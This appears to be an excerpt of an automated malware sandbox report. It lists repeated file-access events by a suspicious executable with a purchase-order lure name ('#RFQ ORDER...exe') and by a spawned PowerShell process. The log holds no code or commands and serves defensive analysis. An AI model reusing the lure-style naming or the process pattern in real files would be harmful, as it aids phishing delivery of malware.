Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
